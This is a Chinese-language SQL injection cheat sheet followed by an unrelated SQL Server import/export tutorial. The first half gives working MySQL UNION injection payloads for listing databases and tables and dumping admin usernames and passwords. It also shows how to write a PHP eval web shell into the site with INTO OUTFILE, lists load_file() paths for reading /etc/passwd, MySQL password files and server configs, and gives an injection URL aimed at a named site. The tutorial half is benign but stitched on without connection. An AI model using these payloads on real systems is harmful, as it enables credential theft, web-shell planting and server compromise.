MYSQL注入语句大全

Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其中记录了Mysql中所有存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。1.得到所有数据库名：|SCHEMATA                 ->存储数据库名的表|---字段：SCHEMA_NAME     ->数据库名称 |TABLES                   ->存储表名|---字段：TABLE_SCHEMA    ->表示该表名属于哪个数据库名|---字段：TABLE_NAME      ->存储表的表名 |COLUMNS                  ->存储的字段名表|---字段：TABLE_SCHEMA    ->该字段所属数据库名|---字段：TABLE_NAME      ->存储所属表的名称 |---字段：COLUMN_NAME     ->该字段的名称   ########################################################################### 0x001 获取系统信息: union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da​tabase(),0x3c62723e,database()),7,8,9 /* /* @@global.version_compile_os 获取系统版本 @@datadir 数据库路径database() 当前数据库名称0x3c62723e 换行HEX值 */   ###################################################################### 0x002 获取表名 union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*   /* 0x67617264656e 为当前数据库名 group_concat(table_name)   使用group_concat函数 一步获得该库所有表名 */ ######################################################################   0x003 获取字段 union select  1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns   where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /* /* group_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段 0x61646d696e ->选择一个表 0x67617264656e ->数据库名 */ #####################################################################   0x004 获取数据 union select 1,2,3,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin   /* 0x3c62723e 换行符号HEX编码 group_concat 同时获得该字段所有数据

 感觉挺不错的，收集整理的挺好的。

 

/* 确认数据库类型 (只有MYSQL解析/*)

 

 

   and ord(mid(version(),1,1))>51/* 确认数据库版本 51是ASCII码3 正确则>4.0 错误则<4.0

 

 

   union select 1,1,1,****1,1 返回正确 确认字段数

 

   order by 13 返回最后一个正确为字段数

 

   

   union select 1,2,3,4,****11,12,13 from admin 返回正确则admin表名 存在 假设出现数字 2

 

   union select 1,version(),3,*** 13 from admin 暴数据库版本

 

   union select 1,username,3,*** 13 from admin   暴账号/密码

 

   union select 1,username,3,*** 13 from admin where id=2 暴admin表 第2个用户 主键为ID

 

   and ord(mid(user(),1,1))=144/* 判断ROOT权限 返回正确存在

   

 

 

暴字段长度

 

Order by num/*

 

 

匹配字段

 

and 1=1 union select 1,2,3,4,5…….n/*

 

 

暴字段位置

 

and 1=2 union select 1,2,3,4,5…..n/*

 

利用内置函数暴数据库信息

 

version() database() user()

 

不用猜解可用字段暴数据库信息(有些网站不适用):

 

and 1=2 union all select version() /*

 

and 1=2 union all select database() /*

 

and 1=2 union all select user() /*

 

操作系统信息：

 

and 1=2 union all select @@global.version_compile_os from mysql.user /*

 

数据库权限：

 

and ord(mid(user(),1,1))=114 /* 返回正常说明为root

 

暴库 (mysql>5.0)

 

Mysql 5 以上有内置库 information_schema，存储着mysql的所有数据库和表结构信息

 

and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1

 

 

猜表

 

and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=数据库（十六进制） limit 0（开始的记录，0为第一个开始记录）,1（显示1条记录）—

 

 

猜字段

 

and 1=2 Union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=表名（十六进制）limit 0,1

 

 

暴密码

 

and 1=2 Union select 1,2,3,用户名段,5,6,7,密码段,8,9 from 表名 limit 0,1

 

高级用法（一个可用字段显示两个数据内容）：

 

Union select 1,2,3concat(用户名段,0x3c,密码段),5,6,7,8,9 from 表名 limit 0,1

 

直接写马(Root权限)

 

条件：1、知道站点物理路径

 

2、有足够大的权限（可以用select …. from mysql.user测试）

 

3、magic_quotes_gpc()=OFF

 

select ‘<?php eval($_POST[cmd])?>' into outfile ‘物理路径'

 

and 1=2 union all select 一句话HEX值 into outfile '路径'

 

 

load_file() 常用路径：

 

 

　　1、 replace(load_file(0×2F6574632F706173737764),0×3c,0×20)

　　2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))

　　上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.

　　3、 load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录

　　4、/etc tpd/conf tpd.conf或/usr/local/apche/conf tpd.conf 查看linux APACHE虚拟主机配置文件

　　5、c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf 查看WINDOWS系统apache文件

　　6、c:/Resin-3.0.14/conf/resin.conf 查看jsp开发的网站 resin文件配置信息.

　　7、c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机

　　8、d:\APACHE\Apache2\conf\httpd.conf

　　9、C:\Program Files\mysql\my.ini

　　10、../themes/darkblue_orange/layout.inc.php phpmyadmin 爆路径

　　11、 c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置文件

　　12、 /usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看

　　13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上

　　14 、/usr/local/app/apache2/conf/extra tpd-vhosts.conf APASHE虚拟主机查看

　　15、 /etc/sysconfig/iptables 本看防火墙策略

　　16 、 usr/local/app/php5 b/php.ini PHP 的相当设置

　　17 、/etc/my.cnf MYSQL的配置文件

    18、 /etc/redhat-release 红帽子的系统版本

　　19 、C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码

　　20、/etc/sysconfig/network-scripts/ifcfg-eth0 查看IP.

　　21、/usr/local/app/php5 b/php.ini //PHP相关设置

　　22、/usr/local/app/apache2/conf/extra tpd-vhosts.conf //虚拟网站设置

　　23、C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini

　　24、c:\windows\my.ini

25、c:\boot.ini

 

网站常用配置文件 config.inc.php、config.php。load_file（）时要用replace（load_file(HEX)，char(60),char(32)）

 

注：

 

Char(60)表示 <

 

Char（32）表示 空格

 

 

手工注射时出现的问题：

 

当注射后页面显示：

 

Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'

 

如：http://www.www.myhack58.com/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,load_file(0x433A5C626F6F742E696E69),3,4,user()%20

 

这是由于前后编码不一致造成的，

 

解决方法：在参数前加上 unhex(hex(参数))就可以了。上面的URL就可以改为：

 

http://www.www.myhack58.com/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,unhex(hex(load_file(0x433A5C626F6F742E696E69))),3,4,unhex(hex(user()))%20

 

既可以继续注射了

SELECT * FROM OpenDataSource( 'Microsoft.Jet.OLEDB.4.0','Data Source="c:\test.xls";User ID=Admin;Password=;Extended properties=Excel 5.0')...xactions/*动态文件名declare @fn varchar(20),@s ...

SELECT * FROM OpenDataSource( 'Microsoft.Jet.OLEDB.4.0',
'Data Source="c:\test.xls";User ID=Admin;Password=;Extended properties=Excel 5.0')...xactions
/*动态文件名
declare @fn varchar(20),@s varchar(1000)
set @fn = 'c:\test.xls'
set @s ='''Microsoft.Jet.OLEDB.4.0'',
''Data Source="'+@fn+'";User ID=Admin;Password=;Extended properties=Excel 5.0'''
set @s = 'SELECT * FROM OpenDataSource ($'">'+@s+')...sheet1$'
exec(@s)
*/

SELECT cast(cast(科目编号 as numeric(10,2)) as nvarchar(255))+'　' 转换后的别名
FROM OpenDataSource( 'Microsoft.Jet.OLEDB.4.0',
'Data Source="c:\test.xls";User ID=Admin;Password=;Extended properties=Excel 5.0')...xactions

/********************** EXCEL导到远程SQL
insert OPENDATASOURCE(
'SQLOLEDB',
'Data Source=远程ip;User ID=sa;Password=密码'
).库名.dbo.表名 (列名1,列名2)
SELECT 列名1,列名2
FROM OpenDataSource( 'Microsoft.Jet.OLEDB.4.0',
'Data Source="c:\test.xls";User ID=Admin;Password=;Extended properties=Excel 5.0')...xactions

/** 导入文本文件
EXEC master..xp_cmdshell 'bcp dbname..tablename in c:\DT.txt -c -Sservername -Usa -Ppassword'

/** 导出文本文件
EXEC master..xp_cmdshell 'bcp dbname..tablename out c:\DT.txt -c -Sservername -Usa -Ppassword'
或
EXEC master..xp_cmdshell 'bcp "Select * from dbname..tablename" queryout c:\DT.txt -c -Sservername -Usa -Ppassword'

导出到TXT文本，用逗号分开
exec master..xp_cmdshell 'bcp "库名..表名" out "d:\tt.txt" -c -t ,-U sa -P password'

BULK INSERT 库名..表名
FROM 'c:\test.txt'
WITH (
FIELDTERMINATOR = ';',
ROWTERMINATOR = '\n'
)

--/* dBase IV文件
select * from 
OPENROWSET('MICROSOFT.JET.OLEDB.4.0'
,'dBase IV;HDR=NO;IMEX=2;DATABASE=C:\','select * from [客户资料4.dbf]')
--*/

--/* dBase III文件
select * from 
OPENROWSET('MICROSOFT.JET.OLEDB.4.0'
,'dBase III;HDR=NO;IMEX=2;DATABASE=C:\','select * from [客户资料3.dbf]')
--*/

--/* FoxPro 数据库
select * from openrowset('MSDASQL',
'Driver=Microsoft Visual FoxPro Driver;SourceType=DBF;SourceDB=c:\',
'select * from [aa.DBF]')
--*/

/**************导入DBF文件****************/
select * from openrowset('MSDASQL',
'Driver=Microsoft Visual FoxPro Driver;
SourceDB=e:\VFP98\data;
SourceType=DBF',
'select * from customer where country != "USA" order by country')
go
/***************** 导出到DBF ***************/
如果要导出数据到已经生成结构(即现存的)FOXPRO表中,可以直接用下面的SQL语句

insert into openrowset('MSDASQL',
'Driver=Microsoft Visual FoxPro Driver;SourceType=DBF;SourceDB=c:\',
'select * from [aa.DBF]')
select * from 表

说明:
SourceDB=c:\ 指定foxpro表所在的文件夹
aa.DBF 指定foxpro表的文件名.

/*************导出到Access********************/
insert into openrowset('Microsoft.Jet.OLEDB.4.0', 
'x:\A.mdb';'admin';'',A表) select * from 数据库名..B表

/*************导入Access********************/
insert into B表 selet * from openrowset('Microsoft.Jet.OLEDB.4.0', 
'x:\A.mdb';'admin';'',A表)

文件名为参数
declare @fname varchar(20)
set @fname = 'd:\test.mdb'
exec('SELECT a.* FROM opendatasource(''Microsoft.Jet.OLEDB.4.0'',
'''+@fname+''';''admin'';'''', topics) as a ')

SELECT * 
FROM OpenDataSource( 'Microsoft.Jet.OLEDB.4.0',
'Data Source="f:\northwind.mdb";Jet OLEDB:Database Password=123;User ID=Admin;Password=;')...产品

********************* 导入 xml　文件

DECLARE @idoc int
DECLARE @doc varchar(1000)
--sample XML document
SET @doc ='
<root>
<Customer cid= "C1" name="Janine" city="Issaquah">
<Order oid="O1" date="1/20/1996" amount="3.5" />
<Order oid="O2" date="4/30/1997" amount="13.4">Customer was very satisfied
</Order>
</Customer>
<Customer cid="C2" name="Ursula" city="Oelde" >
<Order oid="O3" date="7/14/1999" amount="100" note="Wrap it blue 
white red">
<Urgency>Important</Urgency>
Happy Customer.
</Order>
<Order oid="O4" date="1/20/1996" amount="10000"/>
</Customer>
</root>
'
-- Create an internal representation of the XML document.
EXEC sp_xml_preparedocument @idoc OUTPUT, @doc

-- Execute a SELECT statement using OPENXML rowset provider.
SELECT *
FROM OPENXML (@idoc, '/root/Customer/Order', 1)
WITH (oid char(5), 
amount float, 
comment ntext 'text()')
EXEC sp_xml_removedocument @idoc

???????

/**********************Excel导到Txt****************************************/
想用
select * into opendatasource(...) from opendatasource(...)
实现将一个Excel文件内容导入到一个文本文件

假设Excel中有两列，第一列为姓名，第二列为很行帐号(16位)
且银行帐号导出到文本文件后分两部分，前8位和后8位分开。

邹健：
如果要用你上面的语句插入的话,文本文件必须存在,而且有一行:姓名,银行账号1,银行账号2
然后就可以用下面的语句进行插入
注意文件名和目录根据你的实际情况进行修改.

insert into
opendatasource('MICROSOFT.JET.OLEDB.4.0'
,'Text;HDR=Yes;DATABASE=C:\'
)...[aa#txt]
--,aa#txt)
--*/
select 姓名,银行账号1=left(银行账号,8),银行账号2=right(银行账号,8) 
from 
opendatasource('MICROSOFT.JET.OLEDB.4.0'
,'Excel 5.0;HDR=YES;IMEX=2;DATABASE=c:\a.xls'
--,Sheet1$)
)...[Sheet1$]

如果你想直接插入并生成文本文件,就要用bcp

declare @sql varchar(8000),@tbname varchar(50)

--首先将excel表内容导入到一个全局临时表
select @tbname='[##temp'+cast(newid() as varchar(40))+']'
,@sql='select 姓名,银行账号1=left(银行账号,8),银行账号2=right(银行账号,8) 
into '+@tbname+' from 
opendatasource(''MICROSOFT.JET.OLEDB.4.0''
,''Excel 5.0;HDR=YES;IMEX=2;DATABASE=c:\a.xls''
)...[Sheet1$]'
exec(@sql)

--然后用bcp从全局临时表导出到文本文件
set @sql='bcp "'+@tbname+'" out "c:\aa.txt" /S"(local)" /P"" /c'
exec master..xp_cmdshell @sql

--删除临时表
exec('drop table '+@tbname)
/********************导整个数据库*********************************************/

用bcp实现的存储过程

/*
实现数据导入/导出的存储过程
根据不同的参数,可以实现导入/导出整个数据库/单个表
调用示例:
--导出调用示例
----导出单个表
exec file2table 'zj','','','xzkh_sa..地区资料','c:\zj.txt',1
----导出整个数据库
exec file2table 'zj','','','xzkh_sa','C:\docman',1

--导入调用示例
----导入单个表
exec file2table 'zj','','','xzkh_sa..地区资料','c:\zj.txt',0
----导入整个数据库
exec file2table 'zj','','','xzkh_sa','C:\docman',0

*/
if exists(select 1 from sysobjects where name='File2Table' and objectproperty(id,'IsProcedure')=1)
drop procedure File2Table
go
create procedure File2Table
@servername varchar(200) --服务器名
,@username varchar(200) --用户名,如果用NT验证方式,则为空''
,@password varchar(200) --密码
,@tbname varchar(500) --数据库.dbo.表名,如果不指定:.dbo.表名,则导出数据库的所有用户表
,@filename varchar(1000) --导入/导出路径/文件名,如果@tbname参数指明是导出整个数据库,则这个
参数是文件存放路径,文件名自动用
表名.txt
,@isout bit --1为导出,0为导入
as
declare @sql varchar(8000)

if @tbname like '%.%.%' --如果指定了表名,则直接导出单个表
begin
set @sql='bcp '+@tbname
+case when @isout=1 then ' out ' else ' in ' end
+' "'+@filename+'" /w'
+' /S '+@servername
+case when isnull(@username,'')='' then '' else ' /U '+@username end
+' /P '+isnull(@password,'')
exec master..xp_cmdshell @sql
end
else
begin --导出整个数据库,定义游标,取出所有的用户表
declare @m_tbname varchar(250)
if right(@filename,1)<>'\' set @filename=@filename+'\'

set @m_tbname='declare #tb cursor for select name from '+@tbname+'..sysobjects where xtype=''U'''
exec(@m_tbname)
open #tb
fetch next from #tb into @m_tbname
while @@fetch_status=0
begin
set @sql='bcp '+@tbname+'..'+@m_tbname
+case when @isout=1 then ' out ' else ' in ' end
+' "'+@filename+@m_tbname+'.txt " /w'
+' /S '+@servername
+case when isnull(@username,'')='' then '' else ' /U '+@username end
+' /P '+isnull(@password,'')
exec master..xp_cmdshell @sql
fetch next from #tb into @m_tbname
end
close #tb
deallocate #tb 
end
go

/************* Oracle **************/
EXEC sp_addlinkedserver 'OracleSvr', 
'Oracle 7.3', 
'MSDAORA', 
'ORCLDB'
GO

delete from openquery(mailser,'select * from yulin')

select * from openquery(mailser,'select * from yulin')

update openquery(mailser,'select * from yulin where id=15')set disorder=555,catago=888

insert into openquery(mailser,'select disorder,catago from yulin')values(333,777)

补充：

对于用bcp导出,是没有字段名的.

用openrowset导出,需要事先建好表.

用openrowset导入,除ACCESS及EXCEL外,均不支持非本机数据导入